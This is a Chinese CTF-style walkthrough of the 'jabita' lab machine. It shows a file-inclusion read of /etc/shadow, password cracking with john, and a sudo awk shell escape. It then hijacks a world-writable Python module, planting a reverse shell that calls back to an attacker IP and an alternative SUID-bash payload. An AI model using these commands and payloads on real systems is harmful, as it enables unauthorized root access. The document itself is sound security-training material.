jabita-python库劫持提权-suid-阿里云开发者社区

jabita-python库劫持提权-suid

2024-10-10 33

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： jabita-python库劫持提权-suid


jabita	easy	文件包含利用、shadow爆破、sudo-awk 提权、python库劫持提权、python反弹shell

主机发现

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth0 -r 192.168.44.139/24

服务探测

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -A -T 4 -p- 192.168.44.147

22, 80

目录扫描

┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.44.147 -x php,html.txt.png -e

http://192.168.44.147/building   
在这个页面随便点个home
发现这个页面可能存在文件包含http://192.168.44.147/building/index.php?page=home.php
初次尝试得到结果
http://192.168.44.147/building/index.php?page=/etc/shadow

jack:$6$xyz$FU1GrBztUeX8krU/94RECrFbyaXNqU8VMUh3YThGCAGhlPqYCQryXBln3q2J2vggsYcTrvuDPTGsPJEpn/7U.0:19236:0:99999:7::: 
jaba:$y$j9T$pWlo6WbJDbnYz6qZlM87d.$CGQnSEL8aHLlBY/4Il6jFieCPzj7wk54P8K4j/xhi/1:19240:0:99999:7:::

john爆破

爆破

kali㉿kali)-[~/桌面/OSCP]
└─$ john -w=../rockyou.txt hash_jabita
账号：jack
密码：joaninha

提权

jack@jabita:~$ sudo -l
    (jaba : jaba) NOPASSWD: /usr/bin/awk

sudo awk 'BEGIN {system("/bin/sh")}'

jack@jabita:~$ sudo -u jaba  /usr/bin/awk 'BEGIN {system("/bin/sh")}'
$ id
uid=1002(jaba) gid=1002(jaba) groups=1002(jaba)

$ script /dev/null -c bash
jaba@jabita:/home/jack$ sudo -l
    (root) NOPASSWD: /usr/bin/python3 /usr/bin/clean.py

查看这个文件为root 权限，该脚本导入了wild 模块，执行后调用first()方法，输出一个hello。

我们搜索该模块，查看模块内容如下

jaba@jabita:/home/jack$ cat /usr/bin/clean.py 
import wild

wild.first()
jaba@jabita:/home/jack$ ls -all /usr/bin/clean.py 
-rw-r--r-- 1 root root 26 Sep  5  2022 /usr/bin/clean.py
jaba@jabita:/home/jack$ /usr/bin/python3 /usr/bin/clean.py
Hello
jaba@jabita:/home/jack$ find / -type f -name "wild.py" 2>/dev/null
/usr/lib/python3.10/wild.py
jaba@jabita:/home/jack$ cat /usr/lib/python3.10/wild.py
def first():
        print("Hello")
jaba@jabita:/home/jack$ ls -all /usr/lib/python3.10/wild.py
-rw-r--rw- 1 root root 29 Sep  5  2022 /usr/lib/python3.10/wild.py

python库劫持

我们对改文件具有修改的权限，因此可以尝试python库劫持进行提取

那么接下来我们可以使用python反弹一个shell,代码如下

import os
def first():
  os.system("python3 -c \"import       os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.44.128',9000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);\"")

jaba@jabita:/home/jack$ sudo -u root /usr/bin/python3 /usr/bin/clean.py

实战中，如果机器不出网，我们可以修改该脚本的内容，让它可以使用 SUID 执行 bash。或者直接创建一个root权限的账号。

import os
def first():  
  os.system("chmod u+s /bin/bash")

find / -perm -u=s -type f 2>/dev/null


jaba@jabita:/home/jack$ bash -p
bash-5.1# whoami
root

bash-5.1# cat user.txt 
2e0942f09699435811c1be613cbc7a39
bash-5.1# cat root.txt 
f4bb4cce1d4ed06fc77ad84ccf70d3fe

jabita-python库劫持提权-suid

主机发现

服务探测

目录扫描

john爆破

提权

python库劫持

热门文章

最新文章

相关课程

相关电子书

相关实验场景

推荐镜像

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

jabita-python库劫持提权-suid

主机发现

服务探测

目录扫描

john爆破

提权

python库劫持

热门文章

最新文章

相关课程

相关电子书

相关实验场景

推荐镜像